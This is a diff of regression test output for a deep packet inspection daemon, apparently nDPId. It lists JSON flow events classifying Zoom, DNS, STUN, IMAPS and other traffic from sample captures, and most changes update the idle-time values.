+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520469950,"flow_last_seen":1569520470454,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":17285,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1569520470022,"flow_last_seen":1569520470628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":19889,"flow_avg_l4_payload_len":602,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469221,"flow_last_seen":1569520469399,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469189,"flow_last_seen":1569520469375,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00822{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469253,"flow_last_seen":1569520469433,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 
00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1569520466316,"flow_last_seen":1569520471572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2925,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1569520466316,"flow_last_seen":1569520471572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2925,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470742,"flow_last_seen":1569520471166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7752,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520470755,"flow_last_seen":1569520471166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7744,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470742,"flow_last_seen":1569520471166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7752,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 
+00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520470755,"flow_last_seen":1569520471166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7744,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} 
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":185,"flow_first_seen":1569520471748,"flow_last_seen":1569520473190,"flow_idle_time":180000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":1029,"flow_tot_l4_payload_len":184465,"flow_avg_l4_payload_len":997,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470769,"flow_last_seen":1569520471156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7746,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 
-00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1569520470776,"flow_last_seen":1569520471159,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6714,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470769,"flow_last_seen":1569520471156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7746,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 
+00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1569520470776,"flow_last_seen":1569520471159,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6714,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} 
-00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7560000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7560000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569520471915,"flow_last_seen":1569520473157,"flow_idle_time":180000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1569520469341,"flow_last_seen":1569520469413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5783,"flow_avg_l4_payload_len":361,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1569520469341,"flow_last_seen":1569520469413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5783,"flow_avg_l4_payload_len":361,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1569520471189,"flow_last_seen":1569520473190,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":57752,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1569520469341,"flow_last_seen":1569520469413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5783,"flow_avg_l4_payload_len":361,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1569520469341,"flow_last_seen":1569520469413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5783,"flow_avg_l4_payload_len":361,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1569520471189,"flow_last_seen":1569520473190,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":57752,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","packets-captured":700,"packets-processed":697,"total-skipped-flows":0,"total-l4-data-len":329478,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":29,"total-detection-updates":23,"total-updates":0,"current-active-flows":0,"total-active-flows":33,"total-idle-flows":33,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":211,"global_ts_msec":1569520473198} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/zoom2.pcap.out b/test/results/zoom2.pcap.out index bff452a86..645af5029 100644 --- a/test/results/zoom2.pcap.out +++ b/test/results/zoom2.pcap.out 
@@ -1,12 +1,12 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"zoom2.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"zoom2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1642965458402} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965458402,"flow_last_seen":1642965458402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1642965458402,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1642965458402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1642965458402,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGngDAqAGykMNJmsOcAbton\/9jAAAAALAC\/\/+GrAAAAgQFtAEDAwUBAQgKBNjhZQAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1642965458577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642965458577,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGrQSQw0mawKgBsgG7w5wp5A9SaJ\/\/ZKASqbBcNQAAAgQFrAQCCApc+vuKBNjhZQEDAww="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1642965458577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1642965458577,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGngzAqAGykMNJmsOcAbton\/9kKeQPU4AQECwj1wAAAQEICgTY4hFc+vuK"} 